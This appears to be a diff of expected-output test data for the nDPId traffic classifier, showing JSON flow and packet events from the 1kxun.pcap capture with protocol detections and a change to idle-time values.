00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1470104425455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104425455,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6QAAIARUULAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1470104425762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104425762,"pkt":"\/\/\/\/\/\/\/\/wKC7c+snCABFAAFZOwBAAEARM+XAqAoH\/\/\/\/\/\/YA9gABRUMe\/\/+fLaAAwKC7c+snwKgKBwAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+snQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDIzAAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqAoH\/\/8AAFBvcnQgOAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1470104426276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104426276,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6UAAIARUUHAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1470104426973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1470104426973,"pkt":"TF4M6gNlYMVHBbyMCABFwABMyLEAAEARvv3AqAUQEf0afQB7AHsAOHvnIwIG7AAAJiAAAPbJEf0afdtKfo89Puc520qBhKZDx2jbSoGEtCSHfttKgew\/d58s"} @@ -546,8 +546,8 @@ 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -555,14 +555,14 @@ 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":180000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -584,7 +584,7 @@ 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373232,"flow_last_seen":1470104430168,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1862,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104429964,"flow_last_seen":1470104430065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00933{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 